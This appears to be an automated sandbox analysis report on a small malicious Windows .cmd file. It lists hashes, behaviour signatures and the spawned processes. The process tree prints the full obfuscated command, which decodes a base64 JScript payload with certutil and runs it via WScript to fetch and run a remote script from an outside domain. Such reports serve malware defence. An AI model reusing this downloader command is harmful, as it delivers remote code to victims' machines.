Overview

overview

8

Static

static

1

Doc_283223...64.cmd

windows7-x64

8

Doc_283223...64.cmd

windows10-2004-x64

8

Analysis

  • max time kernel
    144s
  • max time network
    116s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/03/2023, 12:01

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Doc_2832233887.335561.17564.cmd

  • Size

    323B

  • MD5

    8610c13e7131e2104e5e9fe763dcb11f

  • SHA1

    96d6beb6244a7f1581edc0929c543249fd622c86

  • SHA256

    5f14cc7f6d1f7bb086cc919162c12a68e6ad5fa0eff346b659d3ed6933e09184

  • SHA512

    13b8785b44b1d75ed4a41e57ecac7e1722879cf5fb089665b1d3e929bbe412c703c3529972bd7967a26ace1222faceaac25d7faa1481cba3870bfb2807235221

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Doc_2832233887.335561.17564.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\system32\cmd.exe
      cmd C:\Windows\system32\cmd.exe /V/D/c "md C:+PPO1\>nul 2>&1 &&s^eT NKXN=C:+PPO1\^053PPO1.^jS&&echo dmFyIENFYVE9InNjIisiciI7REVhUT0iaXAiKyJ0OmgiO0VFYVE9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDRWFRK0RFYVErRUVhUSsiLy90ZG9pZTcuZW1hbnVlbGx5cmViZWNhYmFwdGlzdGFnYXAuYm9uZC8/MS8iKTs=>!NKXN!&&cErtUtil -f -dEco^de !NKXN! !NKXN!&&ca^ll !NKXN!"
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1288
      • C:\Windows\system32\certutil.exe
        cErtUtil -f -dEcode C:+PPO1\053PPO1.jS C:+PPO1\053PPO1.jS
        3⤵
          PID:4248
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\+PPO1\053PPO1.jS"
          3⤵
          • Blocklisted process makes network request
          PID:4928

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\+PPO1\053PPO1.jS
            Filesize

            125B

            MD5

            bb622772b804691b44207300c08a6a76

            SHA1

            055c7a0485d9a0fee48b4fc37c9dd7ed13983b61

            SHA256

            44b3dd740e8b04a30491b370563573201b877c7902ac8ffdc78d74558a512ac5

            SHA512

            a15779ab175f7fe37fb065958fdf6915a9ef42d1aca89599b2f1f96cf047b0ab0906047c980a307efed3cee1542a074e1ce257c1b190a1bc7d8e4536158c5d83

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\+PPO1\053PPO1.jS
            Filesize

            125B

            MD5

            bb622772b804691b44207300c08a6a76

            SHA1

            055c7a0485d9a0fee48b4fc37c9dd7ed13983b61

            SHA256

            44b3dd740e8b04a30491b370563573201b877c7902ac8ffdc78d74558a512ac5

            SHA512

            a15779ab175f7fe37fb065958fdf6915a9ef42d1aca89599b2f1f96cf047b0ab0906047c980a307efed3cee1542a074e1ce257c1b190a1bc7d8e4536158c5d83

            Download Submit